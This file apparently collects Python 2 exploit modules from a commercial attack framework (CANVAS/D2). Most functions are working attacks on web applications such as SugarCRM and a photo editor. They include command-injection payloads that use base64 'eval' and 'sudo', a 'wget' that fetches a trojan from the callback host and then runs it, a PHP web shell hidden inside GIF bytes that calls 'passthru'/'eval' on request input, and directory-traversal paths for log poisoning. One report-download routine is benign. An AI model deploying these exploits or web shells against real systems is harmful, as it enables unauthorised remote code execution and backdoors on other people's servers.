def run(self): self.getargs() test = self.test() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.hostname, self.port)) self.log("Attacking %s:%d" % (self.hostname, self.port)) #self.log("Basic Auth User: %s"%self.basicauth_user) self.log("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user != "": auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath self.log("useragentstring: %s" % useragentstring) UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self) response = UA.POST( self.loginpage, "module=Users&action=Authenticate&return_module=Users&return_action=Login&cant_login=&login_module=&login_action=&login_record=&user_name=%s&user_password=%s&login_theme=Sugar&login_language=en_us&Login=++Login++" % (self.username, self.password), noresponse=False) #self.log("AFTER LOGIN %s"%response) #if the user has not assigned a valid timezone in which they reside then we can't continue to get a userid #if "action=SetTimezone" in response: #self.log("setting time zone for %s"%self.username) response = UA.POST( self.timezonepage, "record=&module=Users&action=SaveTimezone&SaveTimezone=true&timezone=America%2FNew_York&button=++Save++" ) #self.log(response) #find out what are assigned userid is #<a href="index.php?module=Emails&action=ListView&assigned_user_id=abf7c77b-2f71-8071-63ba-4a131068e9a2&type=archived"> #not very pretty - but it works! response = UA.GET(self.composemailpage) #self.log(response) try: userid = response.split("assigned_user_id=")[1].split("&")[0] self.log("Assigned User-Id: %s" % userid) except: self.log( "Couldn't determine our assigned_user_id - make sure we are connecting to the correct SugarCRM host!" ) return 0 #push our file up UA.addHeader( "Content-Type", "multipart/form-data; boundary=---------------------------3922242971797626524322043819" ) response = UA.POST(self.composemailpage, self.getfile()) #self.log(response) #{"guid":"c7e4746b-bba6-6dfd-7a2b-4a3977a03f0d","name":".php","nameForDisplay":".php"} try: prefix = response.split(",")[0].split(":")[1].strip("\"") ourphpfilename = prefix + ".php" self.log("our remote filename: %s" % ourphpfilename) except: self.log( "Couldn't determine our remote filename - make sure we are connecting to the correct SugarCRM host!" ) return 0 ourfile = self.pathtoourfile + "//" + userid + "//" + ourphpfilename self.log("Path to our file: %s" % ourfile) #execute our file! UA.clearHeaders() response = UA.GET(ourfile, noresponse=True) for i in xrange(0, 3): #wait three seconds for callback time.sleep(1) ret = self.ISucceeded() if ret: break if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) if (self.argsDict.get("cmd", self.cmd) == ""): self.TROJANMODE = 1 self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) s = self.gettcpsock() try: s.connect((self.host, self.port)) except: self.log('Could not connect to port %s:%s' % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) self.cmd = '%s > ../backup/d2' % self.cmd self.cmd = base64.b64encode( 'sudo /opt/cma/bin/clear_keys.pl fakeclientfqdn ";%s;" /fakedir' % self.cmd) params = urllib.urlencode({ 'url': 'aHR0cDovL3d3dy5kMnNlYy5jb20=', 'args_reason': 'unknown', 'filetype': 'unknown', 'user_encoded': 'ZDI=', 'domain': 'http://www.d2sec.com;eval `printf %s | base64 -d`' % self.cmd, 'raw_category_id': '1|2|3|4', 'user': '******' }) url = "/end-user/index.php?c=blocked&action=continue" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.POST(mainurl, params) url = "/backup/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) if (self.TROJANMODE == 1): while 1: time.sleep(1) else: self.log('[D2SEC] %s' % data) return 1
def download(self, widget): self.SelectedScan = [] column_names = ['ID', 'Name', 'Date'] gladefile = self.exploitpath + "simple2.glade" self.wTree2 = gtk.glade.XML(gladefile) dic = { "on_start_clicked": self.start, "on_delreport_toggled": self.activatedel, "on_deselectall_clicked": self.deselectall, "on_selectall_clicked": self.selectall } self.wTree2.signal_autoconnect(dic) self.loaddlg = self.wTree2.get_widget("exploit_dialog") try: self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico") except: pass # Init reports treeview self.treeview_3 = self.wTree2.get_widget("mytree") self.treestore_3 = gtk.TreeStore(str, str, str) self.treeview_3.set_show_expanders(False) self.treeview_3.set_model(self.treestore_3) self.treeselection = self.treeview_3.get_selection() self.treeselection.set_mode(gtk.SELECTION_MULTIPLE) column = [None] * len(column_names) column[0] = gtk.TreeViewColumn(column_names[0], gtk.CellRendererText(), text=0) column[0].set_resizable(True) column[0].set_sort_column_id(0) column[1] = gtk.TreeViewColumn(column_names[1], gtk.CellRendererText(), text=1) column[1].set_resizable(True) column[1].set_sort_column_id(1) column[2] = gtk.TreeViewColumn(column_names[2], gtk.CellRendererText(), text=2) column[2].set_resizable(True) column[2].set_sort_column_id(2) self.treeview_3.append_column(column[0]) self.treeview_3.append_column(column[1]) self.treeview_3.append_column(column[2]) # Start downloader dialog result = self.loaddlg.run() if (result == gtk.RESPONSE_OK): if (self.treeselection.count_selected_rows() > 0): model, paths = self.treeselection.get_selected_rows() for p in paths: iter = self.treestore_3.get_iter(p) tmpRef = model.get_value(iter, 0) self.SelectedScan.append(tmpRef) for ref in self.SelectedScan: mainurl = "https://" + self.qhost headers = [("Content-Type", "application/json")] UA = spkproxy.UserAgent(mainurl, exploit=self) data = UA.GET( self.jsonurl + "primary=vulnerabilities&secondary=report&action=getreport&format=xml&network=%s&apikey=%s" % (ref, self.apikey)) response = json.loads(data) if "error" in response: error = response['error'] self.log( "[D2 LOG] AVDS ERROR [%s %s %s]" % (error['type'], error['param'], error['message'])) continue if not "compresseddata" in response: self.log("[D2 LOG] ERROR: No scan available") return buff = response['compresseddata'] buff = base64.b64decode(buff) xml = zlib.decompress(buff) if not os.path.exists(self.exploitpath + "reports/"): os.mkdir(self.exploitpath + "reports/") filename = self.exploitpath + "reports/" + ref f = open(filename, "w") f.write(xml) f.close() self.ReportFiles.append(filename) self.treestore_2.append(None, [filename]) else: self.log("[D2 LOG] - No AVDS report selected") self.loaddlg.destroy()
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (self.name, self.host, self.port)) self.log("Using version: %s" % self.version) if self.version == 0: ret = self.test() if not ret: self.setInfo( "%s against %s:%d (failed: didn't find vulnerable target!)" % (self.name, self.host, self.port)) self.log("Testing didn't find vulnerable target") return 0 if not self.hostname: self.hostname = self.host self.log("Attacking %s:%d" % (self.host, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) #setup our UA first if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None targetstring = protocol + "://" + self.hostname + ":" + str( self.port) + self.basepath self.log("Targetstring: %s" % targetstring) self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) if hasattr(self, "content_type"): self.ua.addHeader("Content-Type", self.content_type) if self.webserverport: self.set_up_webserver() noresponse = True noresponse = True if self.command: #we do get the response if we are sending it a command noresponse = False if self.verb == "POST": body = self.getbody() self.log("POSTING data of length %s" % len(body)) data = self.ua.POST( self.targetpath, body, noresponse=noresponse ) #fix noresponce in POST noresponse=noresponse elif self.verb == "GET": data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(), noresponse=noresponse) if self.command and data: blah = self.parse_command_response(data) if self.webserverport: #let's accept a connection if this is an RFI exploit #we should have timed out on the top connection ret = self.server.accept() if ret: self.log("Found callback to our web server: %s!" % ret) else: self.log("Recved result of: %s" % data) ret = self.ISucceeded() return ret
def __init__(self): canvasexploit.__init__(self) #hostname="http://google.com" #elf.hostname=hostname self.ua=spkproxy.UserAgent("") #placeholder self.name="" #self.ssl="" self.webserverport=0 #set to non-zero to make it an RFI exploit self.shell=chr(0x47)+chr(0x49)+chr(0x46)+chr(0x38)+chr(0x39)+chr(0x61)+\ chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0xf7)+chr(0x00)+\ chr(0x00)+chr(0xa4)+chr(0xb6)+chr(0xa4)+chr(0x16)+chr(0x00)+\ chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x4c)+chr(0x15)+chr(0x00)+\ chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x69)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x6e)+chr(0x62)+chr(0x00)+\ chr(0x00)+chr(0x15)+chr(0x00)+chr(0x67)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x34)+chr(0x00)+chr(0x75)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x61)+chr(0xc0)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x89)+chr(0x00)+chr(0x00)+chr(0x1c)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0xa9)+chr(0x00)+chr(0x00)+chr(0x20)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x56)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+\ """<?php error_reporting(0); ini_set('max_execution_time',0); print 'startz'; passthru(base64_decode($_REQUEST[SERVER_INFO])); eval(base64_decode($_REQUEST[SERVER_INFO2])); print 'endz'; exit; ?>"""+\ chr(0x38)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+\ chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x98)+chr(0x01)+chr(0x00)+\ chr(0xcc)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x58)+chr(0x00)+chr(0x10)+chr(0xe6)+chr(0x00)+\ chr(0x04)+chr(0x12)+chr(0x00)+chr(0x10)+chr(0x00)+chr(0x00)+\ chr(0x04)+chr(0x05)+chr(0x00)+chr(0x01)+chr(0x90)+chr(0x00)+\ chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xc8)+chr(0x00)+chr(0x10)+chr(0xd5)+chr(0x00)+\ chr(0xe8)+chr(0xf5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xff)+chr(0x00)+chr(0x13)+chr(0xff)+chr(0x00)+\ chr(0x6c)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\ chr(0x74)+chr(0x6a)+chr(0x00)+chr(0x03)+chr(0x16)+chr(0x00)+\ chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xc4)+chr(0x00)+chr(0x30)+chr(0x1e)+chr(0x00)+\ chr(0x75)+chr(0xe5)+chr(0x00)+chr(0x15)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0xdc)+chr(0x00)+chr(0x00)+\ chr(0xe7)+chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x70)+chr(0x00)+chr(0x01)+chr(0x59)+chr(0x00)+\ chr(0x00)+chr(0x18)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x04)+chr(0x00)+chr(0x88)+chr(0x01)+chr(0x00)+\ chr(0xe8)+chr(0x05)+chr(0x00)+chr(0x12)+chr(0x01)+chr(0x00)+\ chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x04)+chr(0xe3)+chr(0x00)+\ chr(0x42)+chr(0x12)+chr(0x00)+chr(0x6e)+chr(0x00)+chr(0x00)+\ chr(0x74)+chr(0x7e)+chr(0x00)+chr(0x30)+chr(0x00)+chr(0x00)+\ chr(0x87)+chr(0x00)+chr(0x00)+chr(0x6e)+chr(0xc0)+chr(0x00)+\ chr(0x74)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\ chr(0xff)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\ chr(0xff)+chr(0xff)+chr(0x00)+chr(0xd6)+chr(0xff)+chr(0x00)+\ chr(0x32)+chr(0xff)+chr(0x00)+chr(0x6e)+chr(0xff)+chr(0x00)+\ chr(0x74)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\ chr(0x5b)+chr(0xff)+chr(0x00)+chr(0xe5)+chr(0xff)+chr(0x00)+\ chr(0x77)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\ chr(0x15)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x07)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x58)+chr(0x00)+chr(0x00)+chr(0x03)+chr(0x00)+\ chr(0xf0)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x06)+chr(0x00)+chr(0x00)+chr(0xf6)+chr(0x00)+\ chr(0x00)+chr(0xe4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x0f)+chr(0x00)+chr(0x00)+chr(0x1e)+chr(0x00)+\ chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0xf8)+chr(0x74)+chr(0x00)+chr(0x62)+chr(0xe7)+\ chr(0x00)+chr(0x01)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0xc8)+chr(0x68)+chr(0x00)+chr(0x28)+\ chr(0x32)+chr(0x15)+chr(0xe5)+chr(0xe6)+chr(0x00)+chr(0x77)+\ chr(0x77)+chr(0xa4)+chr(0x00)+chr(0xff)+chr(0xe5)+chr(0x00)+\ chr(0xff)+chr(0x12)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\ chr(0xff)+chr(0x00)+chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x00)+\ chr(0x5b)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\ chr(0x77)+chr(0xfc)+chr(0xf8)+chr(0x36)+chr(0xf7)+chr(0x62)+\ chr(0x00)+chr(0x12)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x05)+chr(0x00)+chr(0x36)+chr(0x90)+chr(0x01)+\ chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xc8)+chr(0x04)+chr(0xd8)+chr(0xd5)+chr(0x29)+\ chr(0xed)+chr(0xf5)+chr(0xe5)+chr(0x12)+chr(0x77)+chr(0x77)+\ chr(0x00)+chr(0xff)+chr(0x94)+chr(0xff)+chr(0xff)+chr(0xe7)+\ chr(0xff)+chr(0xff)+chr(0x12)+chr(0xff)+chr(0xff)+chr(0x00)+\ chr(0xff)+chr(0x6a)+chr(0x64)+chr(0x00)+chr(0x16)+chr(0x2f)+\ chr(0x00)+chr(0xf4)+chr(0xe6)+chr(0x00)+chr(0x77)+chr(0x77)+\ chr(0x00)+chr(0xe0)+chr(0x00)+chr(0x9c)+chr(0x18)+chr(0x00)+\ chr(0xe8)+chr(0xe5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0xff)+chr(0x4e)+chr(0x00)+chr(0xff)+\ chr(0x21)+chr(0x15)+chr(0xff)+chr(0x4c)+chr(0x00)+chr(0xff)+\ chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x7c)+chr(0x00)+chr(0x10)+\ chr(0xe8)+chr(0x00)+chr(0xe5)+chr(0x12)+chr(0x00)+chr(0x77)+\ chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x7b)+chr(0x62)+chr(0x00)+\ chr(0xe0)+chr(0x15)+chr(0x00)+chr(0x4e)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x98)+chr(0xb0)+chr(0x01)+chr(0xe8)+\ chr(0xe8)+chr(0x00)+chr(0x12)+chr(0x12)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x64)+chr(0x98)+chr(0x6f)+chr(0x2f)+chr(0x10)+\ chr(0x10)+chr(0xe6)+chr(0xe5)+chr(0xe5)+chr(0x77)+chr(0x77)+\ chr(0x77)+chr(0x00)+chr(0x10)+chr(0x52)+chr(0x00)+chr(0xe4)+\ chr(0xe9)+chr(0x00)+chr(0x4e)+chr(0x12)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x61)+chr(0x20)+chr(0xc8)+chr(0x00)+chr(0x02)+\ chr(0xff)+chr(0x6c)+chr(0x4f)+chr(0xff)+chr(0x00)+chr(0x00)+\ chr(0x7f)+chr(0x69)+chr(0x00)+chr(0x1c)+chr(0x00)+chr(0x01)+\ chr(0xe9)+chr(0x61)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x29)+chr(0x94)+chr(0x00)+chr(0x00)+chr(0xe7)+\ chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x01)+\ chr(0x10)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\ chr(0x77)+chr(0x00)+chr(0xa0)+chr(0x00)+chr(0x00)+chr(0x3a)+\ chr(0x00)+chr(0x00)+chr(0x50)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x30)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x69)+\ chr(0x00)+chr(0x00)+chr(0x61)+chr(0x60)+chr(0x00)+chr(0x74)+\ chr(0xf1)+chr(0x00)+chr(0x74)+chr(0x15)+chr(0x00)+chr(0x69)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0xf0)+chr(0x00)+chr(0x00)+\ chr(0xaa)+chr(0x00)+chr(0x02)+chr(0x47)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x21)+chr(0xf9)+chr(0x04)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x2c)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+\ chr(0x07)+chr(0x08)+chr(0x04)+chr(0x00)+chr(0x01)+chr(0x04)+\ chr(0x04)+chr(0x00)+chr(0x3b)+chr(0x00) self.log_paths = [ "../../../../../../var/log/apache2/access.log", "../../../../../../var/log/apache2/error.log", "../../../../../var/log/apache2/access.log", "../../../../../var/log/apache2/error.log", "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../../../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log", "../../../../../../var/log/apache2/error.log"] self.useragents = [ "Googlebot/2.1 ( http://www.google.com/bot.html)", "msnbot/1.0 (+http://search.msn.com/msnbot.htm)", "Mozilla/5.0 (X11; U; Linux x86; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)", "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6", "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0)", "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.2+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1", "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.7.5) Gecko/20070321 Netscape/8.1.3", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20070321 Netscape/9.0", "Opera/9.23 (Windows NT 5.0; U; en)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", "Mozilla/4.8 [en] (Windows NT 6.0; U)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4", "Opera/9.20 (X11; Linux i686; U; en)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20060601 Firefox/2.0.0.4 (Ubuntu-edgy)", "Opera/9.10 (Windows NT 5.1; U; en)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12", "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.3 (like Gecko)", "Mozilla/5.0 (X11; U; FreeBSD amd64; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.4", "Opera/9.23 (X11; FreeBSD 6 i386; U; en)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5"]
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.password = self.argsDict.get("password", self.password) if (self.argsDict.get("cmd", self.cmd) == ""): self.maketrojan() hex_s = "".join("\\x%02x" % ord(b) for b in self.mosdeftrojan) self.TROJANMODE = 1 self.cmd = "printf \"" + hex_s + "\" > /tmp/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) ua.addHeader( "User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" ) # Authentication url = "/cgi-bin/userLogin" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'username': self.username, 'password': self.password, 'domain': 'LocalDomain', 'loginButton': 'Login', 'state': 'login', 'login': '******', 'verifyCert': '0', 'portalname': 'VirtualOffice', 'ajax': 'true' }) data = ua.POST(mainurl, params) if "Login failed" in data: self.log('[D2SEC] Authentication error') return 0 # Exploitation if self.TROJANMODE == 1: self.split_cmd(ua, hex_s) pass else: self.send_cmd(ua, 'rm -f /usr/src/EasyAccess/www/htdocs/images/d2') self.cmd = '%s > /usr/src/EasyAccess/www/htdocs/images/d2' % self.cmd self.send_cmd(ua, self.cmd) url = "/images/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) if 'not available' in data: self.log('[D2SEC] Result not available') return 0 else: self.log('[D2SEC] %s' % data) return 1
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) if self.version == 0: ret = self.test() if not ret: self.log("Testing didn't find vulnerable target") return 0 self.log("Attacking %s:%d" % (self.host, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None UA = spkproxy.UserAgent(protocol + "://" + self.host + "/" + self.basepath, auth=auth, hostname=self.hostname, exploit=self) if self.command: self.log("Command: %s" % self.command) command = self.command command = "print(startz);passthru('" + command + "');print(endz);" data = UA.POST( "picEditor.php", "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;" ) data = UA.GET("albums/edit/index.php?c=%s" % (urllib.quote_plus(command))) if "startz" in data: result = data.split("startz")[1].split("endz")[0] #self.log("Command data: %s"%prettyprint(data)) self.log("Command result=%s" % prettyprint(result)) ret = 1 else: self.log("Command not run - service patched?!") else: command = self.get_php_to_mosdef().strip() command = command.replace("/", "`pwd|cut -b1`") self.log("Command: %s" % command) self.log("Sending Exploit") data = UA.POST( "picEditor.php", "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;" ) data = UA.GET("albums/edit/index.php?c=%s" % (urllib.quote_plus(command))) self.log("Data=%s" % data) self.log("Looking for PHP connectback") ret = self.ISucceeded() if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret